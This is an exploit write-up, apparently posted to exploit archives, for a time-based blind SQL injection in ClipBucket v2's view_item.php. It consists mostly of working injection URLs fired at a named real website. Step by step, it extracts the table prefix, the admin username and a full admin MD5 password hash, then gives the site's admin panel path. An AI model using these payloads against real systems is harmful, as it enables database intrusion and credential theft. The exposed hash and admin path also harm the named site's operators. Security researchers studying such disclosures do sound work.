=============================================================================== Vulnerable Software: ClipBucket v2 Official Site: http://clip-bucket.com/ ================================================================================ Exploited: In Wild. ================================================================================ Vuln Desc: ClipBucket v2 is prone to Blind Sql injection vuln. It seems it is pretty oldish version and i'm a bit lazy to "fingerprint" which build is vulnerable. Anyways, at least from source code of page it will "say" : If you want to fingerprint is target site vulnerable:Use simply this way: (If you got "delay" this means it is vulnerable version) site.tld/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(1=1,sleep(50),0))-- Theris also another way to fingerprint it: On vulnerable versions you will find such menu's: (Especially Help Menu section on index page) © ClipBucket v2 2012 Home Contact Us About us Privacy Policy Terms of Serivce Help Real exploitation example: radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- table name 13 simvoldur burda http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x3133),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- table prefixi oyrenmek lazimdir: http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name1,1)=char(0x30),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- BU DUZ VERIR. //TRUE http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(0x616263,1,1)=char(0x61),sleep(54),0))-- //TRUE tablin 1ci simvolu: c ========================= http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,1,1)=char(99),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- 2-ci simvolu: b 3-cu simvolu: _ http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,3,1)=char(95),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- table prefix: cb_ User id ni yoxluyuruq: //TRUE http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(userid=char(49),sleep(54),0) from cb_users limit 1)-- ID=1 UNAME: admin http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users limit 1)-- http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users where userid=1)-- Passi cekmek yolu: http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(97),sleep(54),0) from cb_users where userid=1)-- PASS: ======================================================= 1-ci simvol: 3 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(51),sleep(54),0) from cb_users where userid=1)-- YAXUD: http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=0x33,sleep(54),0) from cb_users where userid=1)-- RTIME: 56250 ms ======================================================= 2-ci simvol: 5 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,2,1)=0x34,sleep(54),0) from cb_users where userid=1)-- RTIME: 55578 ms ======================================================= 3-cu simvol: c http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,3,1)=0x43,sleep(54),0) from cb_users where userid=1)-- RTIME: 55579 ms ======================================================= 4-cu simvol: 3 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,4,1)=0x33,sleep(54),0) from cb_users where userid=1)-- RTIME 55656 ======================================================= 5-ci simvol: a http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,5,1)=0x41,sleep(54),0) from cb_users where userid=1)-- RTIME: 56234 ======================================================= 6-ci simvol: 6 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,6,1)=0x36,sleep(54),0) from cb_users where userid=1)-- RTIME: 69672 ms ======================================================= 7-ci simvol: a (yoxla sonra) http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,7,1)=0x41,sleep(54),0) from cb_users where userid=1)-- RTIME : 17266 ms ======================================================= 8-ci simvol: 6 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,8,1)=0x36,sleep(54),0) from cb_users where userid=1)-- RTIME: 56141 ms ======================================================= 9-cu simvol: 6 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,9,1)=0x36,sleep(54),0) from cb_users where userid=1)-- RTIME: 56125 ms ======================================================= 10-cu simvol: 2 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,10,1)=0x32,sleep(54),0) from cb_users where userid=1)-- RTIME: 56157 ms ======================================================= 11-ci simvol: 3 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,11,1)=0x33,sleep(54),0) from cb_users where userid=1)-- RTIME: 55937 ms ======================================================= 12-ci simvol: b http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,12,1)=0x42,sleep(54),0) from cb_users where userid=1)-- RTIME: 56234 ======================================================= 13-cu simvol: 6 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,13,1)=0x36,sleep(54),0) from cb_users where userid=1)-- RTIME: 56219 ms ======================================================== 14-cu simvol: 9 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,14,1)=0x39,sleep(54),0) from cb_users where userid=1)-- RTIME: 56297 ms ======================================================== 15-ci simvol: 5 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,15,1)=0x35,sleep(54),0) from cb_users where userid=1)-- RTIME: 55641 ms ========================================================= 16- ci simvol: f http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,16,1)=0x46,sleep(54),0) from cb_users where userid=1)-- RTIME: 56828 ms ========================================================= 17-ci simvol: 7 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,17,1)=0x37,sleep(54),0) from cb_users where userid=1)-- RTIME: 56296 ms ========================================================= 18-ci simvol: 5 (yoxla sonra) http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,18,1)=0x35,sleep(54),0) from cb_users where userid=1)-- RTIME: 55469 ms ========================================================== 19-cu simvol: 6 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,19,1)=0x36,sleep(54),0) from cb_users where userid=1)-- RTIME: 56390 ms ========================================================= 20-ci simvol: b http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,20,1)=0x42,sleep(54),0) from cb_users where userid=1)-- RTIME: 56375 ======================================================== 21-ci simvol: d (yoxla sonra) http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,21,1)=0x44,sleep(54),0) from cb_users where userid=1)-- RTIME 55796 ms ======================================================= 22-ci simvol: d (yoxla sonra) http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,22,1)=0x44,sleep(54),0) from cb_users where userid=1)-- RTIME 56406 ======================================================= 23-cu simvol: f http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,23,1)=0x46,sleep(54),0) from cb_users where userid=1)-- RTIME: 55563 ms ======================================================== 24-cu simvol: 0 (yoxla sonra) http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,24,1)=0x30,sleep(54),0) from cb_users where userid=1)-- RTIME: 56172 ms ======================================================== 25-ci simvol: 4 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,25,1)=0x34,sleep(54),0) from cb_users where userid=1)-- RTIME: 56078 ms ======================================================== 26-ci simvol: 9 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,26,1)=0x39,sleep(54),0) from cb_users where userid=1)-- RTIME: 55594 ms ======================================================== 27-ci simvol: 6 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,27,1)=0x36,sleep(54),0) from cb_users where userid=1)-- RTIME: 56094 ms ======================================================== 28-ci simvol: 7 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,28,1)=0x37,sleep(54),0) from cb_users where userid=1)-- RTIME: 56109 ms ======================================================== 29-cu simvol: c http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,29,1)=0x43,sleep(54),0) from cb_users where userid=1)-- RTIME: 55563 ms ======================================================== 30-cu simvol: d http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,30,1)=0x44,sleep(54),0) from cb_users where userid=1)-- RTIME: 55625 ms ======================================================== 31-ci simvol: 5 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,31,1)=0x35,sleep(54),0) from cb_users where userid=1)-- RTIME: 56188 ms ========================================================= 32-ci simvol: 7 http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,32,1)=0x37,sleep(54),0) from cb_users where userid=1)-- RTIME: 55625 ms ========================================================= So we got: uname: admin MD5 HASH: 35c3a6a6623b695f756bddf04967cd57 Admin Panel: http://radio5.5.am/admin_area/ //TRUE Verifying is obtainted hash valid? In this case it gives again "delay" which is hint for us: Obtained hash is valid. http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,33)=0x3335633361366136363233623639356637353662646466303439363763643537,sleep(54),0) from cb_users where userid=1)-- [ ]Done[ ] +++++++++My Special thanks to:+++++++++++++++++++++ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru 1337day.com secunia.com securityhome.eu exploitsdownload.com exploit-db.com to all AA Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3.* ++++++++++++++++++++++++++++++++++++++++++++++++ Respect && Thank you. /AkaStep ^_^